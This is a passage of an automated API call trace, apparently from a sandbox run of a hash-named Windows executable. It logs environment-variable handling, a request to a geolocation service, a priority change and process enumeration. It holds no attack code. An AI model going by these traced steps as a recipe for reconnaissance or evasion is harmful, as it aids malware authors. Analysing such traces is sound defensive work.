Ptr=0x691920, Size=0x78) returned 0x691920 [0096.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0096.486] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x2a) returned 0x68b508 [0096.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x68b508, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0096.486] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691920) returned 0x78 [0096.486] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691920, Size=0x7c) returned 0x691920 [0096.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0096.486] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x29) returned 0x68b540 [0096.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x68b540, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0096.486] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691920) returned 0x7c [0096.486] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691920, Size=0x80) returned 0x691920 [0096.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0096.486] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x16) returned 0x691838 [0096.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x691838, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 22 [0096.486] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691920) returned 0x80 [0096.486] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691920, Size=0x84) returned 0x691920 [0096.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.486] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x13) returned 0x691858 [0096.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x691858, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=kEecfMwgj", lpUsedDefaultChar=0x0) returned 19 [0096.486] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691920) returned 0x84 [0096.486] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691920, Size=0x88) returned 0x691920 [0096.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0096.486] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1f) returned 0x68ec70 [0096.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x68ec70, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\kEecfMwgj", lpUsedDefaultChar=0x0) returned 31 [0096.486] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691920) returned 0x88 [0096.487] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691920, Size=0x8c) returned 0x691920 [0096.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0096.487] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x12) returned 0x691878 [0096.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x691878, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0096.487] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691920) returned 0x8c [0096.487] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691920, Size=0x90) returned 0x691920 [0096.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0096.487] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x18) returned 0x6919b8 [0096.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x6919b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0096.487] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691920) returned 0x90 [0096.487] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691920, Size=0x94) returned 0x6919d8 [0096.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0096.487] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x46) returned 0x686ee0 [0096.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x686ee0, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0096.487] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6919d8) returned 0x94 [0096.487] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6919d8, Size=0x98) returned 0x6919d8 [0096.521] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x690f20) returned 0x80 [0096.521] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x690f20) returned 0x80 [0096.521] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x690f20) returned 0x80 [0096.585] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x8ec) returned 0x691a78 [0096.587] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x690f20) returned 0x80 [0096.589] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x10) returned 0x683268 [0096.589] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x690f20) returned 0x80 [0096.590] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x690f20) returned 0x80 [0096.590] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x690f20) returned 0x80 [0096.615] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x690f20) returned 0x80 [0096.646] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0096.744] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x40) returned 0x6827f0 [0096.744] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0097.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18c1c8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18e9c8 | out: lpBuffer=0x18c1c8*, lpdwNumberOfBytesRead=0x18e9c8*=0x22a) returned 1 [0097.573] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0097.573] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0097.573] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x698740 [0097.583] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x240) returned 0x2ab6838 [0097.601] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ab6838 | out: hHeap=0x670000) returned 1 [0097.602] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x698740 | out: hHeap=0x670000) returned 1 [0097.602] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x6827f0 | out: hHeap=0x670000) returned 1 [0097.602] GetCurrentProcess () returned 0xffffffff [0097.602] GetLastError () returned 0x0 [0097.602] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0097.618] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x10) returned 0x6a7620 [0097.618] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x8ec) returned 0x2a9fe10 [0097.658] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x800) returned 0x6ac588 [0097.658] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6ac588, nSize=0x400 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe")) returned 0x5f [0097.658] PathRemoveFileSpecW (in: pszPath="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" | out: pszPath="C:\\Users\\kEecfMwgj\\Desktop") returned 1 [0097.664] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x2aa0708 [0097.664] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --Admin IsNotAutoStart IsNotTask" [0097.664] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18eaa8 | out: pNumArgs=0x18eaa8) returned 0x6b1918*="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" [0097.664] lstrcpyW (in: lpString1=0x18f738, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" [0097.664] lstrcmpW (lpString1="IsAutoStart", lpString2="IsNotAutoStart") returned -1 [0097.664] lstrcmpW (lpString1="IsTask", lpString2="IsNotTask") returned 1 [0097.683] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --Admin IsNotAutoStart IsNotTask" [0097.683] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18ea44 | out: pNumArgs=0x18ea44) returned 0x6b1918*="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" [0097.684] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe") returned="12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" [0097.684] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x752b0000 [0097.684] GetProcAddress (hModule=0x752b0000, lpProcName="EnumProcesses") returned 0x0 [0097.684] GetProcAddress (hModule=0x752b0000, lpProcName="EnumProcessModules") returned 0x0 [0097.684] GetProcAddress (hModule=0x752b0000, lpProcName="GetModuleBaseNameW") returned 0x0 [0097.684] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x75950000 [0097.686] GetProcAddress (hModule=0x75950000, lpProcName="EnumProcesses") returned 0x75951544 [0097.686] GetProcAddress (hModule=0x75950000, lpProcName="EnumProcessModules") returned 0x75951408 [0097.686] GetProcAddress (hModule=0x75950000, lpProcName="GetModuleBaseNameW") returned 0x7595152c [0097.686] EnumProcesses (in: lpidProcess=0x184240, cb=0xa000, lpcbNeeded=0x18ea50 | out: lpidProcess=0x184240, lpcbNeeded=0x18ea50) returned 1 [0097.693] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0097.694] CloseHandle (hObject=0x0) returned 0 [0097.694] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0097.694] CloseHandle (hObject=0x0) returned 0 [0097.694] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10c) returned 0x0 [0097.694] CloseHandle (hObject=0x0) returned 0 [0097.694] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0097.694] CloseHandle (hObject=0x0) returned 0 [0097.694] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x174) returned 0x0 [0097.694] CloseHandle (hObject=0x0) returned 0 [0097.694] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x180) returned 0x0 [0097.694] CloseHandle (hObject=0x0) returned 0 [0097.694] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1a8) returned 0x0 [0097.694] CloseHandle (hObject=0x0) returned 0 [0097.694] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0097.694] CloseHandle (hObject=0x0) returned 0 [0097.694] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0097.694] CloseHandle (hObject=0x0) returned 0 [0097.694] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0097.694] CloseHandle (hObject=0x0) returned 0 [0097.694] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0097.694] CloseHandle (hObject=0x0) returned 0 [0097.695] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0097.695] CloseHandle (hObject=0x0) returned 0 [0097.695] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0097.695] CloseHandle (hObject=0x0) returned 0 [0097.695] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0097.695] CloseHandle (hObject=0x0) returned 0 [0097.695] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0097.695] CloseHandle (hObject=0x0) returned 0 [0097.695] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0097.695] CloseHandle (hObject=0x0) returned 0 [0097.695] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0097.695] CloseHandle (hObject=0x0) returned 0 [0097.695] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x0 [0097.695] CloseHandle (hObject=0x0) returned 0 [0097.695] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x474) returned 0x4ec [0097.695] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0097.695] CloseHandle (hObject=0x4ec) returned 1 [0097.695] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x494) returned 0x0 [0097.696] CloseHandle (hObject=0x0) returned 0 [0097.696] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x520) returned 0x0 [0097.696] CloseHandle (hObject=0x0) returned 0 [0097.696] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x558) returned 0x0 [0097.696] CloseHandle (hObject=0x0) returned 0 [0097.696] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x770) returned 0x4ec [0097.696] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0097.696] CloseHandle (hObject=0x4ec) returned 1 [0097.696] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x77c) returned 0x4ec [0097.696] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0097.696] CloseHandle (hObject=0x4ec) returned 1 [0097.696] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0097.696] CloseHandle (hObject=0x0) returned 0 [0097.697] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x60c) returned 0x0 [0097.697] CloseHandle (hObject=0x0) returned 0 [0097.697] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0097.697] CloseHandle (hObject=0x0) returned 0 [0097.697] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x0 [0097.697] CloseHandle (hObject=0x0) returned 0 [0097.697] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x648) returned 0x4ec [0097.697] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.702] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xc00000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="iexplore.exe") returned 0xc [0097.702] CloseHandle (hObject=0x4ec) returned 1 [0097.702] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x80c) returned 0x4ec [0097.702] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.707] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xc00000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="iexplore.exe") returned 0xc [0097.707] CloseHandle (hObject=0x4ec) returned 1 [0097.708] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x848) returned 0x0 [0097.708] CloseHandle (hObject=0x0) returned 0 [0097.708] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x948) returned 0x4ec [0097.708] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.709] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x1240000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="yet_career.exe") returned 0xe [0097.709] CloseHandle (hObject=0x4ec) returned 1 [0097.710] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x950) returned 0x4ec [0097.710] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.711] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xeb0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="death-consumer.exe") returned 0x12 [0097.711] CloseHandle (hObject=0x4ec) returned 1 [0097.711] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x958) returned 0x4ec [0097.712] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.713] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x9b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="individual up.exe") returned 0x11 [0097.713] CloseHandle (hObject=0x4ec) returned 1 [0097.713] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x960) returned 0x4ec [0097.713] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.715] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xd50000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="most.exe") returned 0x8 [0097.715] CloseHandle (hObject=0x4ec) returned 1 [0097.715] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x968) returned 0x4ec [0097.715] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.717] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xf20000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="someone face among.exe") returned 0x16 [0097.717] CloseHandle (hObject=0x4ec) returned 1 [0097.717] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x970) returned 0x4ec [0097.718] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.719] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xd50000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="add.exe") returned 0x7 [0097.719] CloseHandle (hObject=0x4ec) returned 1 [0097.719] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x978) returned 0x4ec [0097.719] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.721] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x110000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="through anyone.exe") returned 0x12 [0097.721] CloseHandle (hObject=0x4ec) returned 1 [0097.721] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x980) returned 0x4ec [0097.721] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.723] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xb30000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="soldier.exe") returned 0xb [0097.723] CloseHandle (hObject=0x4ec) returned 1 [0097.723] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x988) returned 0x4ec [0097.723] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.725] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xa80000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="during present military.exe") returned 0x1b [0097.725] CloseHandle (hObject=0x4ec) returned 1 [0097.725] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x990) returned 0x4ec [0097.725] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.727] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x2c0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="patientsummersometimes.exe") returned 0x1a [0097.727] CloseHandle (hObject=0x4ec) returned 1 [0097.727] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x998) returned 0x4ec [0097.727] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.729] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0xbb0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="security_role.exe") returned 0x11 [0097.729] CloseHandle (hObject=0x4ec) returned 1 [0097.729] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a0) returned 0x4ec [0097.729] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.731] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x3d0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="better apply patient.exe") returned 0x18 [0097.731] CloseHandle (hObject=0x4ec) returned 1 [0097.731] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9d0) returned 0x4ec [0097.731] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.733] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x1250000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="one.exe") returned 0x7 [0097.733] CloseHandle (hObject=0x4ec) returned 1 [0097.733] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9dc) returned 0x4ec [0097.733] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0097.735] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x2d0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="note.exe") returned 0x8 [0097.735] CloseHandle (hObject=0x4ec) returned 1 [0097.735] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9e8) returned 0x4ec 